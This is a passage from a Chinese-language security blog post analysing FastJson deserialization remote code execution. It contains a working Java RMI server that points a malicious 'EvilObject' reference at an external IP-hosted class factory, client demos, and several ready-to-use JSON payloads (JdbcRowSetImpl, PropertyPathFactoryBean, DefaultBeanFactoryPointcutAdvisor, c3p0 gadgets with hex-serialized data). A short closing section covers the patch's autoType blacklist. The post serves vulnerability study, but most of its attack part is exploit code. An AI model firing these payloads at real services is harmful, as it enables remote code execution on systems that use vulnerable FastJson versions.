<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.jndi.rmi.registry.ReferenceWrapper;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.naming.Reference;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">server_rmi</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(<span class="number">1099</span>);</span><br><span class="line"></span><br><span class="line">        String FactoryURL = <span class="string">"http://101.200.144.143:2333/"</span>;</span><br><span class="line">        Reference evilObj = <span class="keyword">new</span> Reference(<span class="string">"EvilObject"</span>,<span class="string">"EvilObject"</span>,FactoryURL);</span><br><span class="line">        ReferenceWrapper wrapper = <span class="keyword">new</span> ReferenceWrapper(evilObj);</span><br><span class="line">        registry.bind(<span class="string">"EvilObject"</span>, wrapper);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>完整的客户端demo如下所示:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"></span><br><span class="line"><span class="comment">//@dependency&#123;fastjson:1.2.22-1.2.24&#125;</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">jdbcrowsetimpl</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String args[])</span> </span>&#123;</span><br><span class="line">        String payload = <span class="string">"&#123;\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:1099/EvilObject\",\"autoCommit\":true&#125;"</span>;</span><br><span class="line">        Object res = JSON.parse(payload);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在JDK1.8_111环境下，运行的结果如下图所示:</p>
<p><img src="9-1.png" alt=""></p>
<h2 id="PropertyPathFactoryBean"><a href="#PropertyPathFactoryBean" class="headerlink" title="PropertyPathFactoryBean"></a>PropertyPathFactoryBean</h2><p>利用此类在fastjson反序列化过程中进行JNDI注入需要依赖于以下的第三方包</p>
<ul>
<li>spring-beans</li>
<li>spring-context</li>
<li>spring-core</li>
</ul>
<p>在正式开始分析之前，首先介绍一个在spring-context中类<code>org.springframework.jndi.JndiTemplate</code>。它是spring里面用来简化对JNDI的操作的类，提供了lookup、bind方法。来看看它的lookup方法。</p>
<p><img src="1-2.png" alt=""></p>
<p>可以看到正好满足了jndi注入的条件，现在需要考虑的是如何调用到此函数，且参数name可控。接着定位到<code>org.springframework.jndi.JndiLocatorSupport</code>类的lookup函数。</p>
<p><img src="2-2.png" alt=""></p>
<p>该类继承了JndiAccessor类，JndiAccessor类中的getJndiTemplates()函数返回的就是一个JndiTemplate对象。那么接着要找一个调用了JndiLocatorSupport类的lookup函数的类或者直接调用了JndiTemplate类的lookup函数的类。定位到<code>org.springframework.jndi.support.SimpleJndiBeanFactory</code>类。</p>
<p><img src="3-2.png" alt=""></p>
<p>该类继承自JndiLocatorSupport类，且在多个函数中调用了lookup函数。例如，<code>getBean()</code>、<code>doGetType</code>、<code>doGetSingleton</code>。虽然这里有getBean()函数，但由于它存在入口参数，所以不能在反序列化时被自动调用。那么就继续往下看，看看调用了这三个函数之一的其他函数。定位到<code>org.springframework.beans.factory.config.PropertyPathFactoryBean</code>类的<code>setBeanFactory()</code>。</p>
<p><img src="4-2.png" alt=""></p>
<p>可以看到在该函数中调用了this.beanFactory.getBean()函数，SimpleJndiBeanFactory实现了BeanFactory类，且setBeanFactory()函数满足fastjson反序列化时自动调用的条件。到此整个分析结束。</p>
<h3 id="EXP构造-2"><a href="#EXP构造-2" class="headerlink" title="EXP构造"></a>EXP构造</h3><p>上面分析了整个过程。首先待反序列化的类是<code>PropertyPathFactoryBean</code>，根据条件。</p>
<ul>
<li>1）需要给成员变量beanFactory赋值且赋值为<code>SimpleJndiBeanFactory</code>类的对象。</li>
<li>2 需要给targetBeanName赋值为jndi的url。</li>
</ul>
<p>因此，payload形式为:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">	&quot;@type&quot;: &quot;org.springframework.beans.factory.config.PropertyPathFactoryBean&quot;,</span><br><span class="line">	&quot;targetBeanName&quot;: &quot;rmi:&#x2F;&#x2F;127.0.0.1&#x2F;EvilObject&quot;,</span><br><span class="line">	&quot;beanFactory&quot;: &#123;</span><br><span class="line">						 &quot;@type&quot;:&quot;org.springframework.jndi.support.SimpleJndiBeanFactory&quot;</span><br><span class="line">					&#125;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后看setBeanFactory()函数中要走到getBean()的条件。</p>
<p><img src="5-2.png" alt=""></p>
<p>很显然，这里的targetBeanName不为null，会走到下面的判断。当propertyPath不为null的情况下，才会继续往下走。</p>
<p>因此payload增加为:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">	&quot;@type&quot;: &quot;org.springframework.beans.factory.config.PropertyPathFactoryBean&quot;,</span><br><span class="line">	&quot;targetBeanName&quot;: &quot;rmi:&#x2F;&#x2F;127.0.0.1&#x2F;EvilObject&quot;,</span><br><span class="line">	&quot;propertyPath&quot;:&quot;foo&quot;,</span><br><span class="line">	&quot;beanFactory&quot;: &#123;</span><br><span class="line">						 &quot;@type&quot;:&quot;org.springframework.jndi.support.SimpleJndiBeanFactory&quot;</span><br><span class="line">					&#125;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后就调用this.beanFactory.getBean()方法。    其实在这里不是很能理解，为什么需要加上”shareableResources”的值为[“rmi://127.0.0.1:1099/EvilObject”]。这是必须条件，如果不填写这个值，反序列化beanFactory的时候就会失败，走不到this.beanFactory.getBean()。</p>
<p>之后的完整的payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">	&quot;@type&quot;: &quot;org.springframework.beans.factory.config.PropertyPathFactoryBean&quot;,</span><br><span class="line">	&quot;targetBeanName&quot;: &quot;rmi:&#x2F;&#x2F;127.0.0.1&#x2F;EvilObject&quot;,</span><br><span class="line">	&quot;propertyPath&quot;:&quot;foo&quot;,</span><br><span class="line">	&quot;beanFactory&quot;: &#123;</span><br><span class="line">						 &quot;@type&quot;:&quot;org.springframework.jndi.support.SimpleJndiBeanFactory&quot;</span><br><span class="line">						 &quot;shareableResources&quot;:[&quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;EvilObject&quot;]</span><br><span class="line">					&#125;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="复现-1"><a href="#复现-1" class="headerlink" title="复现"></a>复现</h3><p>完整的demo</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"></span><br><span class="line"><span class="comment">//@dependency&#123;fastjson:1.2.24 ,spring-beans,spring-context,spring-core&#125;</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">propertypathFactorybbean</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String args[])</span> </span>&#123;</span><br><span class="line">        String payload = <span class="string">"&#123;\"rand1\": &#123;\"@type\": \"org.springframework.beans.factory.config.PropertyPathFactoryBean\",\"targetBeanName\": \"rmi://127.0.0.1:1099/EvilObject\",\"propertyPath\": \"foo\",\"beanFactory\": &#123;\"@type\": \"org.springframework.jndi.support.SimpleJndiBeanFactory\",\"shareableResources\": [\"rmi://127.0.0.1:1099/EvilObject\"]&#125;&#125;&#125;"</span>;</span><br><span class="line">        Object res = JSON.parseObject(payload);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>此外还有以下payload可以尝试。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;rand1&quot;: Set[</span><br><span class="line">  &#123;</span><br><span class="line">    &quot;@type&quot;: &quot;org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor&quot;,</span><br><span class="line">    &quot;beanFactory&quot;: &#123;</span><br><span class="line">      &quot;@type&quot;: &quot;org.springframework.jndi.support.SimpleJndiBeanFactory&quot;,</span><br><span class="line">      &quot;shareableResources&quot;: [</span><br><span class="line">        &quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;EvilObject&quot;</span><br><span class="line">      ]</span><br><span class="line">    &#125;,</span><br><span class="line">    &quot;adviceBeanName&quot;: &quot;rmi:&#x2F;&#x2F;127.0.0.1:10099&#x2F;EvilObject&quot;</span><br><span class="line">  &#125;,</span><br><span class="line">  &#123;</span><br><span class="line">    &quot;@type&quot;: &quot;org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor&quot;</span><br><span class="line">  &#125;</span><br><span class="line">]&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  &quot;rand1&quot;: &#123;</span><br><span class="line">    &quot;@type&quot;: &quot;com.mchange.v2.c3p0.WrapperConnectionPoolDataSource&quot;,</span><br><span class="line">    &quot;userOverridesAsString&quot;: &quot;HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400074578706c6f6974740016687474703a2f2f6c6f63616c686f73743a383038302f740003466f6f;&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  &quot;rand1&quot;: &#123;</span><br><span class="line">    &quot;@type&quot;: &quot;com.mchange.v2.c3p0.JndiRefForwardingDataSource&quot;,</span><br><span class="line">    &quot;jndiName&quot;: &quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;EvilObject&quot;,</span><br><span class="line">    &quot;loginTimeout&quot;: 0</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="补丁"><a href="#补丁" class="headerlink" title="补丁"></a>补丁</h1><p>通过查看补丁发现，原来根据”@type”的值直接加载类的操作修改为checkAutoType函数了。</p>
<p><img src="11.png" alt=""></p>
<p>且默认情况下autoType关闭了，可以看到它会经过一个黑名单判断，从而抛出异常。</p>
<p><img src="12.png" alt=""></p>
<p>其中黑名单中包括了以下大类:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">bsh,</span><br><span class="line">com.mchange,</span><br><span class="line">com.sun.,</span><br><span class="line">java.lang.Thread,</span><br><span class="line">java.net.Socket,</span><br><span class="line">java.rmi,</span><br><span class="line">javax.xml,</span><br><span class="line">org.apache.bcel,</span><br><span class="line">org.apache.commons.beanutils,</span><br><span class="line">org.apache.commons.collections.Transformer,</span><br><span class="line">org.apache.commons.collections.functors,</span><br><span class="line">org.apache.commons.collections4.comparators,</span><br><span class="line">org.apache.commons.fileupload,</span><br><span class="line">org.apache.myfaces.context.servlet,</span><br><span class="line">org.apache.tomcat,</span><br><span class="line">org.apache.wicket.util,</span><br><span class="line">org.codehaus.groovy.runtime,</span><br><span class="line">org.hibernate,</span><br><span class="line">org.jboss,</span><br><span class="line">org.mozilla.javascript,</span><br><span class="line">org.python.core,</span><br><span class="line">org.springframework</span><br></pre></td></tr></table></figure>




<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><ul>
<li><a href="https://p0sec.net/index.php/archives/123/" target="_blank" rel="noopener">FastJson反序列化的前世今生</a></li>
<li><a href="http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/" target="_blank" rel="noopener">fastjson 远程反序列化poc的构造和分析</a></li>
<li><a href="https://kingx.me/Details-in-FastJson-RCE.html" target="_blank" rel="noopener">FastJson反序列化漏洞利用的三个细节 - TemplatesImpl的利用链</a></li>
<li><a href="https://www.dazhuanlan.com/2020/02/10/5e40c9b6f1d85/" target="_blank" rel="noopener">FastJson反序列化漏洞分析</a></li>
<li><a href="https://manning23.github.io/2018/03/01/Fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96jndi%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B%E5%88%86%E6%9E%90/" target="_blank" rel="noopener">FASTJSON反序列化之基于JNDI利用方式</a></li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/05/09/shiro-721/" rel="prev" title="shiro-721 Padding Oracle漏洞分析复现">
      <i class="fa fa-chevron-left"></i> shiro-721 Padding Oracle漏洞分析复现
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/05/16/fastjson-2/" rel="next" title="FastJson反序列化回顾系列(二)">
      FastJson反序列化回顾系列(二) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞信息"><span class="nav-number">1.</span> <span class="nav-text">漏洞信息</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#影响版本"><span class="nav-number">1.1.</span> <span class="nav-text">影响版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞原因"><span class="nav-number">1.2.</span> <span class="nav-text">漏洞原因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用方式"><span class="nav-number">1.3.</span> <span class="nav-text">利用方式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#利用链分析之TemplatesImpl类"><span class="nav-number">2.</span> <span class="nav-text">利用链分析之TemplatesImpl类</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#利用版本"><span class="nav-number">2.1.</span> <span class="nav-text">利用版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用链"><span class="nav-number">2.2.</span> <span class="nav-text">利用链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EXP构造"><span class="nav-number">2.3.</span> <span class="nav-text">EXP构造</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞利用细节"><span class="nav-number">2.4.</span> <span class="nav-text">漏洞利用细节</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#01-outputProperties如何与getOutputProperties-关联起来？"><span class="nav-number">2.4.1.</span> <span class="nav-text">01._outputProperties如何与getOutputProperties()关联起来？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#02-为什么要对-bytecodes进行Base64编码"><span class="nav-number">2.4.2.</span> <span class="nav-text">02.为什么要对_bytecodes进行Base64编码?</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#利用链分析之JNDI注入"><span class="nav-number">3.</span> <span class="nav-text">利用链分析之JNDI注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#JdbcRowSetImpl"><span class="nav-number">3.1.</span> <span class="nav-text">JdbcRowSetImpl</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP构造-1"><span class="nav-number">3.1.1.</span> <span class="nav-text">EXP构造</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#复现"><span class="nav-number">3.1.2.</span> <span class="nav-text">复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PropertyPathFactoryBean"><span class="nav-number">3.2.</span> <span class="nav-text">PropertyPathFactoryBean</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP构造-2"><span class="nav-number">3.2.1.</span> <span class="nav-text">EXP构造</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#复现-1"><span class="nav-number">3.2.2.</span> <span class="nav-text">复现</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#补丁"><span class="nav-number">4.</span> <span class="nav-text">补丁</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参考"><span class="nav-number">5.</span> <span class="nav-text">参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ananaskr</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">28</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ananaskr</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
